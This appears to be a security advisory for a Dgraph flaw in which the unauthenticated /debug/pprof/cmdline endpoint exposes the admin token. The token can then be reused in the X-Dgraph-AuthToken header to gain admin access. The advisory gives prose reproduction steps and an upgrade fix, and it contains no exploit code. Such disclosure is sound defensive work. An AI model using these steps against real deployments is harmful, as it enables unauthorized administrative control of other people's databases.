Dgraph Unauthenticated Credential Disclosure Vulnerability in Debug Endpoint Allowing Unauthorized Admin Access

A vulnerability exists in Dgraph, an open-source distributed GraphQL database, in versions through 25.3.1. The issue is an unauthenticated credential disclosure, where the /debug/pprof/cmdline endpoint is accessible without authentication. This endpoint exposes the full process command line, including the admin token set via the --security 'token=...' startup flag. An attacker can retrieve this token and use it in the X-Dgraph-AuthToken header to gain unauthorized access to admin-only endpoints, such as /admin/config/cache_mb. This bypasses the token validation in the adminAuthHandler, allowing unauthorized privileged administrative access. The vulnerability is present in any deployment where the Alpha HTTP port is accessible to untrusted parties.

Impact

Exploitation of this vulnerability leads to unauthorized privileged administrative access in Dgraph Alpha, allowing attackers to make configuration changes and control operational functions via admin endpoints.

Reproduction

To reproduce this vulnerability, start Dgraph Alpha with an admin token configured through the --security startup flag. Ensure that the Alpha HTTP port is reachable by untrusted traffic and that the /debug/pprof/cmdline endpoint is exposed without authentication. After verifying that the admin token is required for accessing certain admin endpoints, the token can be extracted from the debug endpoint and reused in the X-Dgraph-AuthToken header to gain unauthorized access to the admin functionality.

Remediation

Users should upgrade to Dgraph version 25.3.2, where this vulnerability has been fixed.